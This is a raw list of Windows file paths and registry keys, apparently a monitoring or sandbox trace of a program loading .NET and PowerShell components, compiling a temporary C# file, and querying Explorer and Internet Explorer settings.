C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\GetEvent.types.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\types.ps1xml
C:\Windows\sysnative\tzres.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\WSMan.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Certificate.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\FileSystem.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Help.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Registry.format.ps1xml
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni.dll
C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\091b931d0f6408001747dbbbb05dbe66\System.Configuration.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.JScript\71e40c479d779f2bf55bb925834e3cd3\Microsoft.JScript.ni.dll
C:\Users\user\AppData\Local\Temp\9zdcwezu.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\1033\cscompui.dll
C:\Users\user\AppData\Local\Temp\9zdcwezu.cmdline
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\alink.dll
C:\Users\user\AppData\Local\Temp\9zdcwezu.0.cs
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\System.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorlib.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorpe.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader.dll
C:\Users\user\AppData\Local\Temp\9zdcwezu.pdb
C:\Users\user\AppData\Local\Temp\CSCC783.tmp
C:\Users\user\AppData\Local\Temp\RESC794.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
C:\Users\user\AppData\Local\Temp\255757898
C:\Users\user\AppData\Local\Temp\nse9B27.tmp\System.dll
C:\Users\user\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
\??\PIPE\srvsvc
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VSG2JVG94V2257O0TMPH.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\user\AppData\Local\Temp\9zdcwezu.tmp
C:\Users\user\AppData\Local\Temp\9zdcwezu.0.cs
C:\Users\user\AppData\Local\Temp\9zdcwezu.dll
C:\Users\user\AppData\Local\Temp\9zdcwezu.cmdline
C:\Users\user\AppData\Local\Temp\9zdcwezu.out
C:\Users\user\AppData\Local\Temp\9zdcwezu.err
C:\BVTBin\Tests\installpackage\csilogfile.log
C:\Users\user\AppData\Local\Temp\9zdcwezu.pdb
C:\Users\user\AppData\Local\Temp\CSCC783.tmp
C:\Users\user\AppData\Local\Temp\RESC794.tmp
C:\Users\user\AppData\Local\Temp\nst6FC3.tmp
C:\Users\user\AppData\Local\Temp\nse9B27.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VSG2JVG94V2257O0TMPH.temp
C:\Users\user\AppData\Local\Temp\9zdcwezu.cmdline
C:\Users\user\AppData\Local\Temp\9zdcwezu.pdb
C:\Users\user\AppData\Local\Temp\9zdcwezu.dll
C:\Users\user\AppData\Local\Temp\9zdcwezu.0.cs
C:\Users\user\AppData\Local\Temp\9zdcwezu.out
C:\Users\user\AppData\Local\Temp\9zdcwezu.tmp
C:\Users\user\AppData\Local\Temp\9zdcwezu.err
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2084.13816124
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2084.13816124
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2084.13816139
C:\Users\user\AppData\Local\Temp\RESC794.tmp
C:\Users\user\AppData\Local\Temp\CSCC783.tmp
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{031E4825-7B94-4dc3-B131-E946B44C8DD5}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{04731B67-D933-450a-90E6-4ACD2E9408FE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{04731B67-D933-450a-90E6-4ACD2E9408FE}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11016101-E366-4D22-BC06-4ADA335C892B}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11016101-E366-4D22-BC06-4ADA335C892B}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{26EE0668-A00A-44D7-9371-BEB064C98683}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{26EE0668-A00A-44D7-9371-BEB064C98683}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{4336a54d-038b-4685-ab02-99bb52d3fb8b}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{450D8FBA-AD25-11D0-98A8-0800361B1103}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{450D8FBA-AD25-11D0-98A8-0800361B1103}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{59031a47-3f72-44a7-89c5-5595fe6b30ee}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{89D83576-6BD1-4c86-9454-BEB04E94C819}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{89D83576-6BD1-4c86-9454-BEB04E94C819}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{9343812e-1c37-4a49-a12e-4b2d810d956b}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{9343812e-1c37-4a49-a12e-4b2d810d956b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{daf95313-e44d-46af-be1b-cbacea2c3065}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{daf95313-e44d-46af-be1b-cbacea2c3065}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{e345f35f-9397-435c-8f95-4e922c26259e}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{e345f35f-9397-435c-8f95-4e922c26259e}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\SuppressionPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\Desktop\NameSpace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\Desktop\NameSpace\DelegateFolders
HKEY_CLASSES_ROOT\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{208D2C60-3AEA-1069-A2D7-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{871c5380-42a0-1069-a2ea-08002b30309d}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\ieframe.dll
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\new.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionHigh
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
